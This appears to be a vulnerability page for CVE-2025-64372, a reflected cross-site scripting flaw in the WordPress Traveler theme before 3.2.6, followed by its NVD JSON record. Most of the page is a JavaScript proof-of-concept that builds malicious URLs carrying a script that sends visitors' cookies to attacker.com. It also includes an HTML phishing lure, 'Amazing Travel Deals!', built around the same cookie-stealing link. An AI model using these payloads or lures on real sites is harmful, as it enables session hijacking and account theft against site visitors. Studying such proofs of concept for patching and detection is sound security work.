CVE-2025-64372

// CVE-2025-64372 PoC - Traveler Theme Reflected XSS // Target: WordPress sites using Traveler theme < 3.2.6 // Attack Type: Reflected XSS via URL parameters const https = require('https'); function createXSSPayload(script) { // Encode the script for URL injection const encoded = encodeURIComponent(script); return encoded; } function generateMaliciousURL(targetUrl, paramName) { // XSS payload - steals cookies const xssPayload = '<script>fetch(`https://attacker.com/steal?c=${document.cookie}`)</script>'; const encodedPayload = createXSSPayload(xssPayload); // Common vulnerable parameters in Traveler theme const vulnerableParams = ['s', 'search', 'keyword', 'location', 'cat', 'type', 'start', 'end']; const param = paramName || vulnerableParams[0]; // Construct malicious URL const separator = targetUrl.includes('?') ? '&' : '?'; const maliciousURL = `${targetUrl}${separator}${param}=${encodedPayload}`; return maliciousURL; } function testVulnerability(targetUrl) { console.log('[+] Testing CVE-2025-64372'); console.log('[+] Target:', targetUrl); // Test multiple parameters const params = ['s', 'search', 'keyword', 'location']; params.forEach(param => { const maliciousURL = generateMaliciousURL(targetUrl, param); console.log(`\n[?] Testing parameter: ${param}`); console.log(`[?] Malicious URL: ${maliciousURL}`); // In real testing, send request and check for reflected payload // This requires manual verification or headless browser testing }); } // Example usage // testVulnerability('https://example.com/?post_type=tour'); // HTML PoC for social engineering const htmlPoc = ` <!DOCTYPE html> <html> <head> <title>Special Offer - Click Here!</title> </head> <body> <h1>Amazing Travel Deals!</h1> <p>Click here for exclusive discounts:</p> <a href="http://target-site.com/?s=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>">View Deals</a> </body> </html> `; console.log('HTML Social Engineering PoC:'); console.log(htmlPoc);

{"cve": {"id": "CVE-2025-64372", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:14.130", "lastModified": "2026-04-27T16:16:41.860", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in shinetheme Traveler traveler allows Reflected XSS.This issue affects Traveler: from n/a through < 3.2.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/traveler/vulnerability/wordpress-traveler-theme-3-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}